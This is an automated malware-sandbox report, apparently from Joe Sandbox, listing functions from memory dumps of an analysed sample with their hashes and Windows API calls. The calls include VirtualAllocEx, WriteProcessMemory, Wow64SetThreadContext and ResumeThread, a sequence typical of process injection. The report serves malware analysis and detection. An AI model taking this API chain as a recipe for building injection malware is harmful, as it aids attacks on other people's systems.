1047->1042 1061 723bb7a-723bb7e 1050->1061 1062 723bb88-723bb8c 1050->1062 1051->1050 1061->1062 1063 723bb80 1061->1063 1064 723bb8e-723bb92 1062->1064 1065 723bb9c-723bba0 1062->1065 1063->1062 1064->1065 1066 723bb94 1064->1066 1067 723bba2-723bba6 1065->1067 1068 723bbb0-723bbb4 1065->1068 1066->1065 1067->1068 1069 723bba8 1067->1069 1070 723bbc6-723bbcd 1068->1070 1071 723bbb6-723bbbc 1068->1071 1069->1068 1072 723bbe4 1070->1072 1073 723bbcf-723bbde 1070->1073 1071->1070 1075 723bbe5 1072->1075 1073->1072 1075->1075
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0723BAD6
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325204539.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7230000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 6e1fdfb131d5b99dd1f38b0348021643a840449ad16517341eab1d380bf52460
                                        • Instruction ID: c70189e1a3f7aac72bd8fde35c49e34f1a909c8f0aef3151a9ac68c324ba23fb
                                        • Opcode Fuzzy Hash: 6e1fdfb131d5b99dd1f38b0348021643a840449ad16517341eab1d380bf52460
                                        • Instruction Fuzzy Hash: 34A16CF1D1061ADFDB10CF68C841BEDBBB2BF48314F1481AAD858A7250DB749A85CF92
                                        Function 0723B8A0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0723BAD6
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325204539.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7230000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: ea6573ad05ae3f1d2408a7e0ede2adef22c5b633289aff4b287a5ac805bd58d6
                                        • Instruction ID: 744abf38df4714df35d3fb4c6b8094517a3f40047484e81d5d80a9b3f80945e2
                                        • Opcode Fuzzy Hash: ea6573ad05ae3f1d2408a7e0ede2adef22c5b633289aff4b287a5ac805bd58d6
                                        • Instruction Fuzzy Hash: 8E917EF1D1061ADFDB20CF68C841BEDBBB2BF44314F14816AD818A7254DB749A85CF91
                                        Function 0723B613 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0723B6A8
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325204539.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7230000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: d024e7a20a09a5d0c594f9c1edce7406b67dba2919d258b05d2d6aea10bd54cb
                                        • Instruction ID: ba4c04def1c3050f09cca29b07c68b13643b0ae3a00471d090058957922be0c5
                                        • Opcode Fuzzy Hash: d024e7a20a09a5d0c594f9c1edce7406b67dba2919d258b05d2d6aea10bd54cb
                                        • Instruction Fuzzy Hash: E12148B19003499FCB10CFA9C885BEEBBF5FF48310F10842AE919A7241D7789945CFA4
                                        Function 0723B618 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0723B6A8
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325204539.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7230000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 516a4f718084e88bcf8377762dfd3789b8c07a44f7c4a9caedd6d0bebb860347
                                        • Instruction ID: 4b125722b9ad6fcb171192c876e55d3823184532746485d5a5a782215cdac0c3
                                        • Opcode Fuzzy Hash: 516a4f718084e88bcf8377762dfd3789b8c07a44f7c4a9caedd6d0bebb860347
                                        • Instruction Fuzzy Hash: F82126B19003499FCB10DFAAC885BEEBBF5FF48310F10842AE919A7241D7789944CBA4
                                        Function 0723B703 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0723B788
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325204539.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7230000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: cffc85fa011a9dcd37df9ebf097bebbcac1c6503216cbcef252965c7b4cd57fc
                                        • Instruction ID: 35896d75930617fb5ba5e6cdead3c85ac41242481c2bad1a7ffac2ea629c8f97
                                        • Opcode Fuzzy Hash: cffc85fa011a9dcd37df9ebf097bebbcac1c6503216cbcef252965c7b4cd57fc
                                        • Instruction Fuzzy Hash: 712137B1D002599FCB10DFAAC885AEEFBF5FF48310F14842AE519A7240C7389945DFA0
                                        Function 0723B708 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0723B788
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325204539.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7230000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: 8745973d71d98bfcc2683dc1cbde7e2219e1df1e6260fefe404fab20e4b0af40
                                        • Instruction ID: 8db5da0865975aa6db010d06cc033618c26ea17b549a67cfc4bbf3442a2931ff
                                        • Opcode Fuzzy Hash: 8745973d71d98bfcc2683dc1cbde7e2219e1df1e6260fefe404fab20e4b0af40
                                        • Instruction Fuzzy Hash: FB2107B1C003599FCB10DFAAC885AEEFBF5FF48310F50842AE519A7250C7789945DBA5
                                        Function 0723B480 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0723B4FE
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325204539.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7230000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: b72acc9ae55cf0a572b556e217518afa7bba46ff1b8f0b7a4085874edd3174a6
                                        • Instruction ID: 62fd5aed47c0e6983e5e67ca147cabbf9b885caf99ab221f8063dbad1d98aceb
                                        • Opcode Fuzzy Hash: b72acc9ae55cf0a572b556e217518afa7bba46ff1b8f0b7a4085874edd3174a6
                                        • Instruction Fuzzy Hash: DD2127B1D003098FDB10DFAAC485BEEBBF4EF88314F14842AD519A7241DB78A945CFA5
                                        Function 0723B3C8 Relevance: 1.6, APIs: 1, Instructions: 58threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325204539.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7230000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 5c9b77ef0dcc59282b132f602b26f846158c7dea348ee0a0288236345ee0ce3c
                                        • Instruction ID: 8a82fb676023928262dd50ffbb3a32d3f4bc2a1a946b663f360de3019a1bc979
                                        • Opcode Fuzzy Hash: 5c9b77ef0dcc59282b132f602b26f846158c7dea348ee0a0288236345ee0ce3c
                                        • Instruction Fuzzy Hash: A9117CF1D002498FCB20DFAAC4457EEFBF4EF89310F24845AD519A3200C779A540CBA4
                                        Function 0723B550 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0723B5C6
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325204539.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7230000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: e7385e186e94410005ee270c3b0f65bab5357b3b3fe3bb8e6c1cc3c4181259a7
                                        • Instruction ID: 805384cb322bb1b140a3118e09dc5b3167f938cb1d73fc732677dd6c65db4a94
                                        • Opcode Fuzzy Hash: e7385e186e94410005ee270c3b0f65bab5357b3b3fe3bb8e6c1cc3c4181259a7
                                        • Instruction Fuzzy Hash: 00115CB1C002499FDB10DFAAC845AEEFFF5EF48310F10881AD519A7250C779A950CFA0
                                        Function 0723B558 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0723B5C6
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325204539.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7230000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: e7d985a2ef866aa21d769c40714f21d2db886268daa9de6811a7393a576a743d
                                        • Instruction ID: d16a72ea9acd0ebfe855936112521d1cead17fc67884fbdb51f7b7cf6ee57fd7
                                        • Opcode Fuzzy Hash: e7d985a2ef866aa21d769c40714f21d2db886268daa9de6811a7393a576a743d
                                        • Instruction Fuzzy Hash: 8D110AB5D002499FCB10DFAAC845AEEBFF5EF48310F14881AD519A7250C775A954CFA1
                                        Function 0723B3D0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325204539.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7230000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 89c90020d387f5d1296dbc3ea09644bda541cd24a1e95265241c1b38971650eb
                                        • Instruction ID: d725b64e6828475c771c745f4c622c365c34a762d898ecc3fa31393697439e54
                                        • Opcode Fuzzy Hash: 89c90020d387f5d1296dbc3ea09644bda541cd24a1e95265241c1b38971650eb
                                        • Instruction Fuzzy Hash: 461136B1D002498FDB20DFAAC4457EEFBF5EF88324F248819D519A7240CB79A944CFA5
                                        Function 0723EFB8 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 0723F01D
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325204539.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7230000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        • Opcode ID: 74cd0d0054bb358e7651717599d861106633776f44adf913eee561bc69c21481
                                        • Instruction ID: 90291e3f4805ed9001d113c8de8d6156b87573e50c990893a433f1fa5dc77335
                                        • Opcode Fuzzy Hash: 74cd0d0054bb358e7651717599d861106633776f44adf913eee561bc69c21481
                                        • Instruction Fuzzy Hash: 8B11F0B5C043499ECB10DF9AD884BDEBFF8EB49320F24845AE558A7241C375A584CFA1
                                        Function 0723D194 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 0723F01D
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325204539.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7230000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        • Opcode ID: 6b8eead585c0abd6091713d1488316e83b83b31fb54047175f402a70e73e1913
                                        • Instruction ID: ba21be52758ffda4972deef149acd31116610b8729a8ac8fe2f8061e80993325
                                        • Opcode Fuzzy Hash: 6b8eead585c0abd6091713d1488316e83b83b31fb54047175f402a70e73e1913
                                        • Instruction Fuzzy Hash: CF1106B5C043499FDB10DF99D544BDEBBF8EB48310F108459E519A7300C375A944CFA5
                                        Function 0729C144 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q
                                        • API String ID: 0-52440209
                                        • Opcode ID: 3afb91d41ae23aa1cd764892c25e625ce0b706bf0e18226dff5ca3a64bbddcc5
                                        • Instruction ID: 3775da75f98fcb1d40b529ce10bf198eef858e8d9c5362a03c738bbcf3c828f0
                                        • Opcode Fuzzy Hash: 3afb91d41ae23aa1cd764892c25e625ce0b706bf0e18226dff5ca3a64bbddcc5
                                        • Instruction Fuzzy Hash: 0D51E171B102069FCB05DFB998489AEBBF6FFC5310B148969E415DB351EB30DD058760
                                        Function 0729CA9B Relevance: 1.4, Strings: 1, Instructions: 144COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: V
                                        • API String ID: 0-1342839628
                                        • Opcode ID: b29169fe9077e2bbcd4d7b0cf1845125f934293dc85e4336be5b584f4ce40246
                                        • Instruction ID: d66589edc854bf5486b069ebe81fe5628259d04da8300efc1a72196d6a833ce9
                                        • Opcode Fuzzy Hash: b29169fe9077e2bbcd4d7b0cf1845125f934293dc85e4336be5b584f4ce40246
                                        • Instruction Fuzzy Hash: E2516AB0934249CBEF14CF79D5447BDBBB6AF45309F0C8476E4669A282C7B999C0CB21
                                        Function 0729F878 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q
                                        • API String ID: 0-52440209
                                        • Opcode ID: af3ecd2145a3226c607a595eb39ef169903c083eb0e10166ff7426008cb9eef6
                                        • Instruction ID: 44b7df2b1e1b5aa2bc84512d47a30af11427576fe8f8cc215c46fcc4d73453cd
                                        • Opcode Fuzzy Hash: af3ecd2145a3226c607a595eb39ef169903c083eb0e10166ff7426008cb9eef6
                                        • Instruction Fuzzy Hash: F3115E75B1020A8BDF44EFB999105EEB7F6AFC8610F644079C509E7344EB358E02CBA5
                                        Function 07290461 Relevance: .3, Instructions: 270COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 75f95c4282191c8c2b674a9eb2142df1abd921ffd47f7580afd4938ebf799b18
                                        • Instruction ID: 9516e34b8b883d5ece87e1ecda5a6d1c6ca1695b9a6d236df1834c618cf2a506
                                        • Opcode Fuzzy Hash: 75f95c4282191c8c2b674a9eb2142df1abd921ffd47f7580afd4938ebf799b18
                                        • Instruction Fuzzy Hash: 73A1067160030ADFC725CF69D4449AABBF9FF85310F18C56AD449CB252D734E94ACBA1
                                        Function 07290590 Relevance: .2, Instructions: 223COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5d8a7d801c142ed07431f178c2f162563de0142053023cb5cf4373dac93fc89a
                                        • Instruction ID: 0bec5cb4e44025fde9b5e4f39c8cc3de6c765152f22134a116fb662c4a20316b
                                        • Opcode Fuzzy Hash: 5d8a7d801c142ed07431f178c2f162563de0142053023cb5cf4373dac93fc89a
                                        • Instruction Fuzzy Hash: A391F3B0A1070BCFCB25CF68C9449AABBF6FF85310B18C579D4498B655DB30E949CBA1
                                        Function 07294E90 Relevance: .2, Instructions: 213COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 39faa91dcf9857e7ee9bd3bd28a581978b7bd87b46f46a232b08c88c69d6e4b6
                                        • Instruction ID: 759edb19e6116204a6f408405509228db89345ce034fcbd9775dc7c196d7e665
                                        • Opcode Fuzzy Hash: 39faa91dcf9857e7ee9bd3bd28a581978b7bd87b46f46a232b08c88c69d6e4b6
                                        • Instruction Fuzzy Hash: DF91C8B4E112098FDB45DFA8D584ACDBBF6EF88300F248269D414AB396D735AD46CF90
                                        Function 0729C798 Relevance: .2, Instructions: 179COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 78068b275350895dd2f5befc2f70a9c3735632448a1194feacf37960572caa11
                                        • Instruction ID: c6a41d8efa8f8ee95f225143bb20d2db965db8393aec8adecff5b0ae5152f33d
                                        • Opcode Fuzzy Hash: 78068b275350895dd2f5befc2f70a9c3735632448a1194feacf37960572caa11
                                        • Instruction Fuzzy Hash: BC7162B1925245CFDF04CF78D584A69FBF9FF4A310F1989A6D0519B2A6C374E980CB60
                                        Function 0729C788 Relevance: .2, Instructions: 178COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5d7f350008321826411faf5b26a78f9dd92851756fa49ffa06336596080a75e0
                                        • Instruction ID: cf94611918e97755130a2a0637058988fa6865345f3379811a0d08d8ad9bcdfb
                                        • Opcode Fuzzy Hash: 5d7f350008321826411faf5b26a78f9dd92851756fa49ffa06336596080a75e0
                                        • Instruction Fuzzy Hash: 3F7183B1925205CFDF04CF78D584AA9F7F9FF4A311F0989A6D0569B2A6C374E980CB60
                                        Function 0729BD0A Relevance: .1, Instructions: 126COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9ff5144f7b93e8b592483d7121a145c9160c4d1ba0213e61246b854ca02a8527
                                        • Instruction ID: 1a02d1bef36a9f5865a2c47447050da1fb3246eb21a8657f02b06004a6d9398b
                                        • Opcode Fuzzy Hash: 9ff5144f7b93e8b592483d7121a145c9160c4d1ba0213e61246b854ca02a8527
                                        • Instruction Fuzzy Hash: 9241B3A451EBC0CFD3179B79A8651417FF4AF8720270A89DBC4C5CFAB3C6699819C722
                                        Function 0729F5A7 Relevance: .1, Instructions: 111COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f88538c6498459f0cf07c396ee6ef4f08ef62f4452103cb2fc50aeb1c210f17f
                                        • Instruction ID: 153e4642db4f426106ed88cf0ab4a010dadc39606d45e2f4c172489b25927441
                                        • Opcode Fuzzy Hash: f88538c6498459f0cf07c396ee6ef4f08ef62f4452103cb2fc50aeb1c210f17f
                                        • Instruction Fuzzy Hash: F54134B5E2120A9FDB44CFB9E9485EEBBB2FF88311F18802AD411E7254D7348941CF90
                                        Function 07292F38 Relevance: .1, Instructions: 93COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c7260fd020ca008b5abcda69b0ff4eb0018a09bb68e59cdac3e85609e096e5c7
                                        • Instruction ID: dca7d6128c9786133606429a78690d9ab85de444fbf69090fd80f44fc4b9e720
                                        • Opcode Fuzzy Hash: c7260fd020ca008b5abcda69b0ff4eb0018a09bb68e59cdac3e85609e096e5c7
                                        • Instruction Fuzzy Hash: 1031B5B5204746EFCB16DF25C880A66BBF6FF85710B0940AFE5458B662D731EC41CB61
                                        Function 0729F5D8 Relevance: .1, Instructions: 90COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2f385322cc404ca7372cd06d712cba9aa7d16d0e7514b66a74f999608025a091
                                        • Instruction ID: b0b621c734a7c7a16cd37a4d35ce21b4a86a29b6ad2347497300e7aaa8551b3d
                                        • Opcode Fuzzy Hash: 2f385322cc404ca7372cd06d712cba9aa7d16d0e7514b66a74f999608025a091
                                        • Instruction Fuzzy Hash: 133133B5E202199FCB48CFA9E5445AEBBB2FF88311F14802AE425A7354D7349941CF90
                                        Function 0729A180 Relevance: .1, Instructions: 79COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 410686e66e4f6b0ce1fa949b58cd49ad6f92961a74919dc3a14854887b630c06
                                        • Instruction ID: c756c86e842b05b8236086b2fd371eb492edda8d0b78ebfafeadc1ea1413a10b
                                        • Opcode Fuzzy Hash: 410686e66e4f6b0ce1fa949b58cd49ad6f92961a74919dc3a14854887b630c06
                                        • Instruction Fuzzy Hash: 953127B4E1520AEFCB48DFA9D9451AEBFF2EF89300F24D4AAC405E7254E7344A41DB90
                                        Function 0729BF28 Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e201df2603f0640fd4e6b2bfe04c73ba68e6067187c87e450cbcfdde8a054e3e
                                        • Instruction ID: c6bc5e33da337b23f44f630f8ba6d7981b745404fe697a6663759b7cf0d090bc
                                        • Opcode Fuzzy Hash: e201df2603f0640fd4e6b2bfe04c73ba68e6067187c87e450cbcfdde8a054e3e
                                        • Instruction Fuzzy Hash: 8E21A7F06282409FD726471DFC55B7B7FB8EB46304F085476F15ACB181E6A49A48CB61
                                        Function 00B0D3D8 Relevance: .1, Instructions: 75COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2200381098.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_b0d000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ff3616ae19a22f6bef010e89b24501ad94d504566b35c525ae98dc0eaa985d9c
                                        • Instruction ID: dce5d8c59afa9d99c96f8be33f83b1f9229542a58fedf9a5336c9f16c605aa5f
                                        • Opcode Fuzzy Hash: ff3616ae19a22f6bef010e89b24501ad94d504566b35c525ae98dc0eaa985d9c
                                        • Instruction Fuzzy Hash: 2621D671504204DFDB05DF54D9C0B2ABFA5FB98324F24C5A9E9090B3D6C33AE856D6A2
                                        Function 00B0D4C4 Relevance: .1, Instructions: 75COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2200381098.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_b0d000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2c8dcae0effba002e43e5e4f0f8a7415371c4685ccf436a35fc9a4a33c5e3903
                                        • Instruction ID: 71cb9837d0315cfaf6fad10a800fed4e6cea393065e66adc955c90aeb1cd3c38
                                        • Opcode Fuzzy Hash: 2c8dcae0effba002e43e5e4f0f8a7415371c4685ccf436a35fc9a4a33c5e3903
                                        • Instruction Fuzzy Hash: 22210371500240DFDB05DF54D9C0F2ABFA5FBA8318F20C5A9ED090B2D6C33AD816DAA2
                                        Function 07297689 Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bd8633afac952ac1524406da8138e4bbf287ce34b66028ac2d27c3bb8316519b
                                        • Instruction ID: 5a67d589b671a3188243c5bbe111a5dabb6ad1fe4601b47babd587ac36309628
                                        • Opcode Fuzzy Hash: bd8633afac952ac1524406da8138e4bbf287ce34b66028ac2d27c3bb8316519b
                                        • Instruction Fuzzy Hash: B6216BB0E25209DFCB04CFA9D6815EEBBF1BF89300F24C5AAD414A7355E7748A45CB91
                                        Function 0729FAFD Relevance: .1, Instructions: 71COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
